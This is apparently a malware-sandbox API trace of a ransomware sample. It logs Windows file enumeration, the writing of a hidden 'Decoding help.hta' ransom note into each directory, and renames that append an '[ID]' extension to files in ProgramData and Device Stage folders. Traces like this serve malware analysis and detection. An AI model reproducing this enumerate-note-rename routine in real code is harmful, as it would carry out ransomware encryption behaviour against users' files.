lpFindFileData=0x1301fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f07a66f, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f07a66f, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76b3ce5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xadc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="device.png", cAlternateFileName="")) returned 1 [0059.207] lstrcpyW (in: lpString1=0x2ab59180, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" [0059.207] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned 95 [0059.207] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta" [0059.207] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\decoding help.hta")) returned 0x20 [0059.207] lstrcmpiW (lpString1="Decoding help.hta", lpString2="device.png") returned -1 [0059.207] lstrlenW (lpString="device.png") returned 10 [0059.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" [0059.207] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned 95 [0059.207] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="device.png" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" [0059.208] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" [0059.208] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.208] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.208] FindNextFileW (in: hFindFile=0x5d8b10, lpFindFileData=0x1301fd30 | out: lpFindFileData=0x1301fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0a07cc, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0a07cc, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76d9e43, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="overlay.png", cAlternateFileName="")) returned 1 [0059.208] lstrcpyW (in: lpString1=0x2ab59180, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" [0059.208] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned 95 [0059.208] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta" [0059.208] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\decoding help.hta")) returned 0x20 [0059.208] lstrcmpiW (lpString1="Decoding help.hta", lpString2="overlay.png") returned -1 [0059.208] lstrlenW (lpString="overlay.png") returned 11 [0059.208] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" [0059.208] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned 95 [0059.208] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="overlay.png" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" [0059.208] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" [0059.208] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.208] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.209] FindNextFileW (in: hFindFile=0x5d8b10, lpFindFileData=0x1301fd30 | out: lpFindFileData=0x1301fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0c6929, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0c6929, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76d9e43, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="superbar.png", cAlternateFileName="")) returned 1 [0059.209] lstrcpyW (in: lpString1=0x2ab59180, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" [0059.209] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned 95 [0059.209] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta" [0059.209] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\decoding help.hta")) returned 0x20 [0059.209] lstrcmpiW (lpString1="Decoding help.hta", lpString2="superbar.png") returned -1 [0059.209] lstrlenW (lpString="superbar.png") returned 12 [0059.209] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" [0059.209] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned 95 [0059.209] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="superbar.png" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" [0059.209] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" [0059.209] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.209] FindNextFileW (in: hFindFile=0x5d8b10, lpFindFileData=0x1301fd30 | out: lpFindFileData=0x1301fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0c6929, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0c6929, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76d9e43, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="superbar.png", cAlternateFileName="")) returned 0 [0059.209] FindClose (in: hFindFile=0x5d8b10 | out: hFindFile=0x5d8b10) returned 1 Thread: id = 669 os_tid = 0xeb8 [0054.451] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x1351fd30 | out: lpFindFileData=0x1351fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2db0 [0054.452] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.452] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x1351fd30 | out: lpFindFileData=0x1351fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.452] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.452] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.452] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x1351fd30 | out: lpFindFileData=0x1351fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b69ee00, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7b69ee00, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7b69ee00, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0xfc90a, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0054.452] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*" [0054.452] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 118 [0054.452] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" [0054.452] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\decoding help.hta")) returned 0xffffffff [0054.452] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa74 [0058.288] WriteFile (in: hFile=0xa74, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1351fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1351fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.289] CloseHandle (hObject=0xa74) returned 1 [0058.289] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.290] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0058.290] lstrlenW (lpString="cab1.cab") returned 8 [0058.290] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*" [0058.290] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 118 [0058.290] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0058.290] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0058.290] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0058.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.290] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x1351fd30 | out: lpFindFileData=0x1351fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a38c100, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7a38c100, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7a38c100, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x0, cFileName="vc_runtimeMinimum_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0058.290] lstrcpyW (in: lpString1=0x24fe73c8, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*" [0058.290] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 118 [0058.290] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" [0058.290] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\decoding help.hta")) returned 0x1 [0058.291] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vc_runtimeMinimum_x64.msi") returned -1 [0058.291] lstrlenW (lpString="vc_runtimeMinimum_x64.msi") returned 25 [0058.291] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*" [0058.291] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 118 [0058.291] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package 